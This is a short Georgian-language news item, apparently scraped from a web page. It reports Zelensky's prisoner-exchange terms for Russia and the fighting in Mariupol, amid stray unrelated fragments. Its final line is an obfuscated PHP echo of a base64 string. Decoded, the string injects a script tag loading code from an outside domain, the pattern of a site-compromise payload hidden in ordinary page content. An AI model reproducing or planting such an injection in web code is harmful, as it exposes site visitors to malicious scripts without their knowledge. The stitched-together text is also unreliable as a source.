celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა ვოლოდიმერ ზელენსკიმ რუს ჟურნალისტებთან საუბრისას, რუსეთს ტყვეთა გაცვლისთვის პირობები დაასახელა – ყოველი 10 ტყვე 10 ტყვეში გაცვალონ, ან იმავე პრინციპით - ყველა ყველაში. 
 
"თუ ისინი ბავშვებს მოიპარავენ, დასრულდება იმით, რომ არანაირი მოლაპარაკებები არ იქნება. ჩვენ ყველაფერს დავტოვებთ, არაფერს დავასრულებთ და არაფერს შევცვლით"– აღნიშნა ზელენსკიმ.
 
პრეზიდენტმა, იმავე ინტერვიუში აღნიშნა, რომ რუსმა ოკუპანტებმა მარიუპოლის ნაწილი დაიკავეს. ის ყოველდღიურად უკავშირდება ქალაქის დამცველ უკრაინელ ჯარისკაცებს და სთავაზობს მათ, დატოვონ ქალაქი, თუმცა ჯარისკაცები უარს აცხადებენ და ამბობენ, რომ ქალაქში ჯერ კიდევ რჩებიან დაჭრილი ადამიანები და დაუსაფლავებელი დაღუპულები, რომლებსაც მიხედვა სჭირდებათ.
842
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");